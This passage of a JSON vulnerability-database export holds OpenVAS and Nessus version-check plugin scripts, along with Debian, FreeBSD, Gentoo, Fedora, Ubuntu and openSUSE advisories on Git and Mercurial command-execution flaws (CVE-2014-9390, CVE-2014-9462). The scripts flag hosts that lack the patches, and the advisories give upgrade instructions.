script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name: \"affected\", value: \"mercurial on Debian Linux\");\n script_tag(name: \"insight\", value: \"Mercurial is a fast, lightweight\nSource Control Management system designed for efficient handling of very large\ndistributed projects.\");\n script_tag(name: \"solution\", value: \"For the oldstable distribution (wheezy),\nthis problem has been fixed in version 2.2.2-4+deb7u1. This update also includes\na fix for CVE-2014-9390\npreviously scheduled for the next wheezy point release.\n\nFor the stable distribution (jessie), this problem has been fixed in\nversion 3.1.2-2+deb8u1.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 3.4-1.\n\nWe recommend that you upgrade your mercurial packages.\");\n script_tag(name: \"summary\", value: \"Jesse Hertz of Matasano Security\ndiscovered that Mercurial, a distributed version control system, is prone to a\ncommand injection vulnerability via a crafted repository name in a clone\ncommand.\");\n script_tag(name: \"vuldetect\", value: \"This check tests the installed software\nversion using the apt package manager.\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"mercurial\", ver:\"2.2.2-4+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"mercurial-common\", ver:\"2.2.2-4+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2020-03-02T20:53:15", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-9462", "CVE-2014-9390"], "description": "Jesse Hertz of Matasano Security\ndiscovered that Mercurial, a distributed version control system, is prone to a\ncommand injection vulnerability via a crafted repository name in a clone\ncommand.", "modified": "2020-02-28T00:00:00", "published": "2015-05-11T00:00:00", "id": "OPENVAS:1361412562310703257", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310703257", "type": "openvas", "title": "Debian Security Advisory DSA 3257-1 (mercurial - security update)", "sourceData": "# OpenVAS Vulnerability Test\n# Auto-generated from advisory DSA 3257-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2015 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.703257\");\n script_version(\"2020-02-28T09:03:19+0000\");\n script_cve_id(\"CVE-2014-9390\", \"CVE-2014-9462\");\n script_name(\"Debian Security Advisory DSA 3257-1 (mercurial - security update)\");\n script_tag(name:\"last_modification\", value:\"2020-02-28 09:03:19 +0000 (Fri, 28 Feb 2020)\");\n script_tag(name:\"creation_date\", value:\"2015-05-11 00:00:00 +0200 (Mon, 11 May 2015)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"http://www.debian.org/security/2015/dsa-3257.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB7\");\n script_tag(name:\"affected\", value:\"mercurial on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the oldstable distribution (wheezy),\nthis problem has been fixed in version 2.2.2-4+deb7u1. This update also includes\na fix for CVE-2014-9390\npreviously scheduled for the next wheezy point release.\n\nFor the stable distribution (jessie), this problem has been fixed in\nversion 3.1.2-2+deb8u1.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 3.4-1.\n\nWe recommend that you upgrade your mercurial packages.\");\n script_tag(name:\"summary\", value:\"Jesse Hertz of Matasano Security\ndiscovered that Mercurial, a distributed version control system, is prone to a\ncommand injection vulnerability via a crafted repository name in a clone\ncommand.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software\nversion using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"mercurial\", ver:\"2.2.2-4+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"mercurial-common\", ver:\"2.2.2-4+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "freebsd": [{"lastseen": "2020-02-26T14:40:10", "bulletinFamily": "unix", "cvelist": ["CVE-2014-9390"], "edition": 2, "description": "\nThe Git Project reports:\n\nWhen using a case-insensitive filesystem an attacker can\n\t craft a malicious Git tree that will cause Git to overwrite\n\t its own .git/config file when cloning or checking out a\n\t repository, leading to arbitrary command execution in the\n\t client machine. If you are a hosting service whose users\n\t may fetch from your service to Windows or Mac OS X machines,\n\t you are strongly encouraged to update to protect such users\n\t who use existing versions of Git.\n\n", "modified": "2014-12-19T00:00:00", "published": "2014-12-19T00:00:00", "href": "https://vuxml.freebsd.org/freebsd/1d567278-87a5-11e4-879c-000c292ee6b8.html", "id": "1D567278-87A5-11E4-879C-000C292EE6B8", "title": "git -- Arbitrary command execution on case-insensitive filesystems", "type": "freebsd", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "gentoo": [{"lastseen": "2016-09-06T19:46:56", "bulletinFamily": "unix", "cvelist": ["CVE-2014-9390"], "description": "### Background\n\nGit is a free and open source distributed version control system designed to handle everything from small to very large projects with speed and efficiency. \n\n### Description\n\nA vulnerability in Git causing Git-compatible clients that access case-insensitive or case-normalizing filesystems to overwrite the .git/config when cloning or checking out a repository, leading to execution of arbitrary commands. \n\n### Impact\n\nAn attacker can execute arbitrary commands on a client machine that clones a crafted malicious Git tree. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll Git 1.8.x users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=dev-vcs/git-1.8.5.6\"\n \n\nAll Git 1.9.x users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=dev-vcs/git-1.9.5\"\n \n\nAll Git 2.0.x users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=dev-vcs/git-2.0.5\"", "edition": 1, "modified": "2015-09-24T00:00:00", "published": "2015-09-24T00:00:00", "id": "GLSA-201509-06", "href": "https://security.gentoo.org/glsa/201509-06", "type": "gentoo", "title": "Git: Arbitrary command execution", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2016-12-07T12:54:23", "bulletinFamily": "unix", "cvelist": ["CVE-2014-9462", "CVE-2016-3068", "CVE-2014-9390", "CVE-2016-3069", "CVE-2016-3630", "CVE-2016-3105"], "edition": 1, "description": "### Background\n\nMercurial is a distributed source control management system.\n\n### Description\n\nMultiple vulnerabilities have been discovered in Mercurial. Please review the CVE identifier and bug reports referenced for details. \n\n### Impact\n\nA remote attacker could possibly execute arbitrary code with the privileges of the process. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll mercurial users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=dev-vcs/mercurial-3.8.4\"", "modified": "2016-12-07T00:00:00", "published": "2016-12-07T00:00:00", "href": "https://security.gentoo.org/glsa/201612-19", "id": "GLSA-201612-19", "type": "gentoo", "title": "Mercurial: Multiple vulnerabilities", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "fedora": [{"lastseen": "2020-12-21T08:17:52", "bulletinFamily": "unix", "cvelist": ["CVE-2014-9390"], "description": "A pure Java implementation of the Git version control system. ", "modified": "2014-12-29T10:06:12", "published": "2014-12-29T10:06:12", "id": "FEDORA:38F0860CEEC1", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 21 Update: eclipse-jgit-3.5.3-1.fc21", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:52", "bulletinFamily": "unix", "cvelist": ["CVE-2014-9390"], "description": "The eclipse-egit package contains Eclipse plugins for interacting with Git repositories. ", "modified": "2014-12-29T10:06:12", "published": "2014-12-29T10:06:12", "id": "FEDORA:4F11F60CEEC6", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 21 Update: eclipse-egit-3.5.3-1.fc21", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2020-09-23T18:54:54", "description": "Matt Mackall and Augie Fackler discovered that Git incorrectly handled\ncertain filesystem paths. A remote attacker could possibly use this\nissue to execute arbitrary code if the Git tree is stored in an HFS+\nor NTFS filesystem. The remote attacker would need write access to a\nGit repository that the victim pulls from.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 14, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2015-01-14T00:00:00", "title": "Ubuntu 12.04 LTS / 14.04 LTS / 14.10 : git vulnerability (USN-2470-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-9390"], "modified": "2015-01-14T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:git", "cpe:/o:canonical:ubuntu_linux:14.10", "cpe:/o:canonical:ubuntu_linux:12.04:-:lts", "cpe:/o:canonical:ubuntu_linux:14.04"], "id": "UBUNTU_USN-2470-1.NASL", "href": "https://www.tenable.com/plugins/nessus/80517", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-2470-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(80517);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/09/22\");\n\n script_cve_id(\"CVE-2014-9390\");\n script_bugtraq_id(71732);\n script_xref(name:\"USN\", value:\"2470-1\");\n\n script_name(english:\"Ubuntu 12.04 LTS / 14.04 LTS / 14.10 : git vulnerability (USN-2470-1)\");\n script_summary(english:\"Checks dpkg output for updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Ubuntu host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Matt Mackall and Augie Fackler discovered that Git incorrectly handled\ncertain filesystem paths. A remote attacker could possibly use this\nissue to execute arbitrary code if the Git tree is stored in an HFS+\nor NTFS filesystem. The remote attacker would need write access to a\nGit repository that the victim pulls from.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/2470-1/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected git package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Malicious Git and Mercurial HTTP Server For CVE-2014-9390');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:git\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:12.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.10\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/02/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/01/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/14\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2015-2020 Canonical, Inc. / NASL script (C) 2015-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(12\\.04|14\\.04|14\\.10)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 12.04 / 14.04 / 14.10\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"12.04\", pkgname:\"git\", pkgver:\"1:1.7.9.5-1ubuntu0.1\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"git\", pkgver:\"1:1.9.1-1ubuntu0.1\")) flag++;\nif (ubuntu_check(osver:\"14.10\", pkgname:\"git\", pkgver:\"1:2.1.0-1ubuntu0.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"git\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-06-05T11:12:24", "description": "libgit2 was updated to fix an arbitrary command execution\nvulnerability on case-insentitive file systems.\n\nThe following vulnerability was fixed :\n\n - When using programs using libgit2 on case-insensitive\n filesystems, .git/config could be overwritten, which\n allowed execution of arbitrary commands (boo#925040,\n CVE-2014-9390).\n\nThe configuration is uncommon as all default file systems on openSUSE\nare case sensitive.\n\nAdditionally, on openSUSE 13.2 libgit2 was updated to version 0.21.5\nto backport further critical fixes.", "edition": 12, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2015-04-08T00:00:00", "title": "openSUSE Security Update : libgit2 (openSUSE-2015-288)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-9390"], "modified": "2015-04-08T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:libgit2-debugsource", "p-cpe:/a:novell:opensuse:libgit2-0-debuginfo", "p-cpe:/a:novell:opensuse:libgit2-0", "cpe:/o:novell:opensuse:13.2", "p-cpe:/a:novell:opensuse:libgit2-21-debuginfo", "p-cpe:/a:novell:opensuse:libgit2-devel", "cpe:/o:novell:opensuse:13.1", "p-cpe:/a:novell:opensuse:libgit2-21"], "id": "OPENSUSE-2015-288.NASL", "href": "https://www.tenable.com/plugins/nessus/82634", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2015-288.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(82634);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/06/04\");\n\n script_cve_id(\"CVE-2014-9390\");\n\n script_name(english:\"openSUSE Security Update : libgit2 (openSUSE-2015-288)\");\n script_summary(english:\"Check for the openSUSE-2015-288 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"libgit2 was updated to fix an arbitrary command execution\nvulnerability on case-insentitive file systems.\n\nThe following vulnerability was fixed :\n\n - When using programs using libgit2 on case-insensitive\n filesystems, .git/config could be overwritten, which\n allowed execution of arbitrary commands (boo#925040,\n CVE-2014-9390).\n\nThe configuration is uncommon as all default file systems on openSUSE\nare case sensitive.\n\nAdditionally, on openSUSE 13.2 libgit2 was updated to version 0.21.5\nto backport further critical fixes.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=925040\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected libgit2 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Malicious Git and Mercurial HTTP Server For CVE-2014-9390');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libgit2-0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libgit2-0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libgit2-21\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libgit2-21-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libgit2-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libgit2-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.2\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/02/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/03/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/04/08\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE13\\.1|SUSE13\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"13.1 / 13.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libgit2-0-0.19.0-2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libgit2-0-debuginfo-0.19.0-2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libgit2-debugsource-0.19.0-2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"libgit2-devel-0.19.0-2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libgit2-21-0.21.5-2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libgit2-21-debuginfo-0.21.5-2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libgit2-debugsource-0.21.5-2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libgit2-devel-0.21.5-2.3.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libgit2-0 / libgit2-0-debuginfo / libgit2-debugsource / etc\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2018-07-15T04:06:39", "description": "The remote Mac OS X host has a version of Apple Xcode prior to 6.2 beta 3. It is, therefore, affected by a remote command execution vulnerability when processing git trees in a case-insensitive or case-normalizing file system. A remote attacker, using a specially crafted git tree, can overwrite a user's '.git/config' file when the user clones or checks out a repository, allowing arbitrary command execution.\n\nThis plugin has been deprecated. It detects Xcode installations vulnerable to CVE-2014-9390, and was created before Apple released a security update to fix this vulnerability. On March 9, 2015, a security update for Xcode has been released. The update fixes multiple vulnerabilities (including CVE-2014-9390). A separate plugin (ID 81758) has been created to detect that update. That plugin should be used instead of this one.", "edition": 3, "published": "2015-01-19T00:00:00", "title": "Apple Xcode < 6.2 beta 3 .git/config Command Execution (Mac OS X) (deprecated)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-9390"], "modified": "2018-07-14T00:00:00", "cpe": ["cpe:/a:apple:xcode"], "id": "MACOSX_XCODE_GIT.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=80828", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# @DEPRECATED@\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(80828);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2018/07/14 1:59:36\");\n\n script_cve_id(\"CVE-2014-9390\");\n script_bugtraq_id(71732);\n script_xref(name:\"APPLE-SA\", value:\"APPLE-SA-2014-12-18-1\");\n\n script_name(english:\"Apple Xcode < 6.2 beta 3 .git/config Command Execution (Mac OS X) (deprecated)\");\n script_summary(english:\"Checks the version of Xcode.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\"This plugin has been deprecated.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Mac OS X host has a version of Apple Xcode prior to 6.2\nbeta 3. It is, therefore, affected by a remote command execution\nvulnerability when processing git trees in a case-insensitive or\ncase-normalizing file system. A remote attacker, using a specially\ncrafted git tree, can overwrite a user's '.git/config' file when the\nuser clones or checks out a repository, allowing arbitrary command\nexecution.\n\nThis plugin has been deprecated. It detects Xcode installations\nvulnerable to CVE-2014-9390, and was created before Apple released a\nsecurity update to fix this vulnerability. On March 9, 2015, a\nsecurity update for Xcode has been released. The update fixes\nmultiple vulnerabilities (including CVE-2014-9390). A separate plugin\n(ID 81758) has been created to detect that update. That plugin should\nbe used instead of this one.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://support.apple.com/en-us/HT204147\");\n script_set_attribute(attribute:\"see_also\", value:\"http://article.gmane.org/gmane.linux.kernel/1853266\");\n # http://git-blame.blogspot.com/2014/12/git-1856-195-205-214-and-221-and.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?afc47628\");\n script_set_attribute(attribute:\"solution\", value:\"n/a\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Malicious Git and Mercurial HTTP Server For CVE-2014-9390');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/12/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/12/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/19\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apple:xcode\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"macosx_xcode_installed.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/MacOSX/Version\", \"installed_sw/Apple Xcode\");\n\n exit(0);\n}\n\nexit(0, 'This plugin has been deprecated. Use Nessus plugin ID 81758 instead.');\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"install_func.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nos = get_kb_item(\"Host/MacOSX/Version\");\nif (!os) audit(AUDIT_HOST_NOT, \"running Mac OS X\");\n# Patch is only available for OS X 10.9.4 and later\nif (ereg(pattern:\"Mac OS X ([0-9]|10\\.[0-8]|10\\.9\\.[0-3])([^0-9]|$)\", string:os)) audit(AUDIT_OS_NOT, \"Mac OS X 10.9.4 or above\");\n\nappname = \"Apple Xcode\";\nappbeta = \"Apple Xcode-Beta\";\n\nvuln = FALSE;\n\ncount = get_install_count(app_name:appname);\nif (count != 0)\n{\n installs = get_installs(app_name:appname);\n foreach install (installs[1])\n {\n path = install[\"path\"];\n ver = install[\"version\"];\n\n #6.1.1 is the current maximum Xcode affected\n #check to see if a vulnerable version of Xcode is installed\n if (ver_compare(ver:ver, fix:'6.1.1', strict:FALSE) <= 0)\n {\n report +=\n '\\n Path : ' + path +\n '\\n Installed version : ' + ver +\n '\\n';\n vuln = TRUE;\n }\n }\n}\n\ncount = get_install_count(app_name:appbeta);\nif (count != 0)\n{\n installs = get_installs(app_name:appbeta);\n foreach install (installs[1])\n {\n path = install[\"path\"];\n ver = install[\"version\"];\n\n if(ver_compare(ver:ver, fix:'6.2', strict:FALSE) < 0)\n {\n report +=\n '\\n Beta path : ' + path +\n '\\n Installed Beta version : ' + ver +\n '\\n';\n vuln = TRUE;\n }\n }\n}\n\nif (vuln)\n{\n if (report_verbosity > 0)\n security_warning(port:0, extra:report);\n else security_warning(port:0);\n}\nelse 